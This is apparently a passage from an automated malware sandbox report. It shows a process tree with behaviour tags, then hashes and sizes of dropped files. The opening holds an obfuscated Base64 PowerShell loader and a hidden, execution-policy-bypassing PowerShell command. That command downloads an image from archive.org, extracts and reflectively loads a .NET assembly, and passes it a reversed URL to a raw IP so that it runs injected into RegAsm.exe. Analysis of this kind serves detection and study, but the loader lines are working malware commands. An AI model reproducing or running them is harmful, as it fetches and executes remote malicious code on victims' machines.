⿉ ㋃ ⼏ ⫟YQBz□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟Ng□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟Ew□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bo□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟PQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟LQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟cgB0□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟bgBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟7□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YgBh□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟2□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟QwBv□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟ZQBU□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟B0□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟UwB1□ ⿉ ㋃ ⼏ ⫟GI□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟aQBu□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟K□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BJ□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟L□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YgBh□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟2□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟T□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟ZwB0□ ⿉ ㋃ ⼏ ⫟Gg□ ⿉ ㋃ ⼏ ⫟KQ□ ⿉ ㋃ ⼏ ⫟7□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YwBv□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BC□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟WwBT□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟EM□ ⿉ ㋃ ⼏ ⫟bwBu□ ⿉ ㋃ ⼏ ⫟HY□ ⿉ ㋃ ⼏ ⫟ZQBy□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟XQ□ ⿉ ㋃ ⼏ ⫟6□ ⿉ ㋃ ⼏ ⫟Do□ ⿉ ㋃ ⼏ ⫟RgBy□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟bQBC□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟cwBl□ ⿉ ㋃ ⼏ ⫟DY□ ⿉ ㋃ ⼏ ⫟N□ ⿉ ㋃ ⼏ ⫟BT□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟cgBp□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Zw□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YgBh□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟2□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟QwBv□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟Ds□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bs□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟YQBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BB□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟cwBl□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YgBs□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟WwBT□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟FI□ ⿉ ㋃ ⼏ ⫟ZQBm□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟ZQBj□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟aQBv□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟LgBB□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟cwBl□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YgBs□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟XQ□ ⿉ ㋃ ⼏ ⫟6□ ⿉ ㋃ ⼏ ⫟Do□ ⿉ ㋃ ⼏ ⫟T□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YwBv□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BC□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟KQ□ ⿉ ㋃ ⼏ ⫟7□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟B5□ ⿉ ㋃ ⼏ ⫟H□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟bwBh□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQBk□ ⿉ ㋃ ⼏ ⫟EE□ ⿉ ㋃ ⼏ ⫟cwBz□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQBi□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟eQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Ec□ ⿉ ㋃ ⼏ ⫟ZQB0□ ⿉ ㋃ ⼏ ⫟FQ□ ⿉ ㋃ ⼏ ⫟eQBw□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟K□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟n□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟bgBs□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟Yg□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟Tw□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Eg□ ⿉ ㋃ ⼏ ⫟bwBt□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟Jw□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟Ds□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bt□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bo□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟eQBw□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟LgBH□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BN□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bo□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟VgBB□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟Jw□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟HY□ ⿉ ㋃ ⼏ ⫟bwBr□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟K□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟dQBs□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟L□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟Fs□ ⿉ ㋃ ⼏ ⫟bwBi□ ⿉ ㋃ ⼏ ⫟Go□ ⿉ ㋃ ⼏ ⫟ZQBj□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟WwBd□ ⿉ ㋃ ⼏ ⫟F0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟B4□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟LgBD□ ⿉ ㋃ ⼏ ⫟FY□ ⿉ ㋃ ⼏ ⫟RQBX□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟TwBN□ ⿉ ㋃ ⼏ ⫟E8□ ⿉ ㋃ ⼏ ⫟R□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟v□ ⿉ ㋃ ⼏ ⫟H□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟c□ ⿉ ㋃ ⼏ ⫟Bt□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟v□ ⿉ ㋃ ⼏ ⫟DE□ ⿉ ㋃ ⼏ ⫟MQ□ ⿉ ㋃ ⼏ ⫟x□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟M□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟DE□ ⿉ ㋃ ⼏ ⫟Lg□ ⿉ ㋃ ⼏ ⫟x□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟MQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟OQ□ ⿉ ㋃ ⼏ ⫟v□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟OgBw□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bo□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟s□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟JwBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟cwBh□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟aQB2□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟s□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟JwBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟cwBh□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟aQB2□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟s□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟JwBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟cwBh□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟aQB2□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟L□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟n□ ⿉ ㋃ ⼏ ⫟FI□ ⿉ ㋃ ⼏ ⫟ZQBn□ ⿉ ㋃ ⼏ ⫟EE□ ⿉ ㋃ ⼏ ⫟cwBt□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟L□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟n□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟KQ□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('□ ⿉ ㋃ ⼏ ⫟','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CVEW/OMOD/ppmax/111.021.141.49//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59faf6f9cd1992cdebfd8e34b48ea9330
SHA1ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA2560c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA51205b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97
-
Filesize
12KB
MD53bd0bfe25cf06f1de6bc915621639aa5
SHA1a0cb09962a2dd8d83636d43f44d80e7b7c003203
SHA256df91fb6239c416c3ad0c6fa2ee6b9491f6b5e185e113282a56c331b6a05df615
SHA5126e77713cdc0af279d88dcb12e3541868eb673d11c4caf209bcc51b60fc9df9dd272f0faf78c0a9985d274a8e0ba8686d97ee43b89f54c054cf4785fe956ecf2b
-
Filesize
19KB
MD59a228dc5144be67e5b6aa8f959b253be
SHA15af48f7b23cb22cb43b59a6e0ece3b929b211ce9
SHA256a946180f931e215015dd364e7928b0533de1d958c254e8a2b8cb07e9910d8b8e
SHA512c3cce3fef8a1afb1592cf705fbc9edd98ca59b32e4e368196e9929363a02c8d4600b8a9779c02bbe553bb6ea0aa7589f5b4b087d1ccd86648f2eac35c11d3033
-
Filesize
1KB
MD55a18a439036240bb66c804afbca64227
SHA14d9a93206e2376adc154f0ec46d54ac7cba4f597
SHA2562208a7a8b7316c69edf87dde7ff01654d155112ab48205a1c97cd84e2e2b2377
SHA5122a9d3d7b7e15c9c0eee797808f2ef77364ae8d4dd9d8d02b965449534516ded9e9847c76c2f4964ee47eb5d656a04a0bf622b6ed32db3d9c534cd2ade615f2c1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD503a8161796906df7434c5d6eacd4cbed
SHA1e5a1011613162cf815dc5085d8824903f36a4fb2
SHA2565fb4208c23b7daae9361019978e4fc8d1aa8ec548f267db4b8134cbd95452fe1
SHA512bd9a785cb099c0b189668bbed16da2955d70b701d60839616f51fbcf732fdcc2fb550cc8ce498bb708fb7fdb7658948028a4427517ba4cee6195b79a95f68459
-
Filesize
179KB
MD5caf64b2016e2f4caf70d865690f7e5e0
SHA11ff3d5ebda9b1105e684101f201d6ccde03568f8
SHA2565132ba606b767573c897b02e29221c615bcf10c430dc99dd313fa9e12a08b114
SHA5127a5481edd308256d30a6bd8346f9288f7a1290946c12caed7a64479820ece31f444169946543c67ce051ec085e6e31d18cd6af0a2cef8f99f36d57250b311258
-
Filesize
652B
MD5c8832129b74e311d7e9d753b7b8b5873
SHA17c3e7a4224947f494e82859d6d3cd42ee145c9f9
SHA25605c66f42837186e275e6725548e2f97c2a7f64990eea6ee90699427d0cd2ebbf
SHA512023072c357b27b696c4d0d5801cfacf9f0f222f293e04522f287f7bf5e860f0112292bdb7a08991fc2262eda440b6af622c619917cd6577962fbdbd7e837b432
-
Filesize
466B
MD5782e9830aae4a4360ef403a34f8ef665
SHA152dae156a3ebce254d6ffe04bb8c2d2a09c22479
SHA256c2350786ee5f28bf0fcbe6cee23d65c8a598a8ad440a7c00048f0ab07add7b6f
SHA512d8af8e913d65f90238ab712607e27e42bd203c06cb4e02f71c67b2fb7ea46e26f3887b7e2f31b3f765a982809146940746f1f86a769b6a0f2d8b36f9a4c9ecc4
-
Filesize
369B
MD5c808adac3c59dc9c7423dcea5edd1303
SHA1f9b7083303ca38ca25e97b7e82b59ec09822c6b1
SHA2566dcb74cadffbbce94d60fea7008a6892b9c97e4e05c89715d73e42ebc48483d2
SHA512bf54af3e5a5feecdb67d85bab1abf571ee1c2680538e5f438efb2c0bae0248da60b3f2ea3383f6437d681508c5e8958098518785d30f7c458278519dd759e963
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
68KB
-
Filesize
600KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
32KB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
104KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
56KB
-
Filesize
216KB
-
Filesize
200KB
-
Filesize
32KB
-
Filesize
40KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
304KB
-
Filesize
652KB
-
Filesize
624KB
-
Filesize
1.1MB
-
Filesize
3.3MB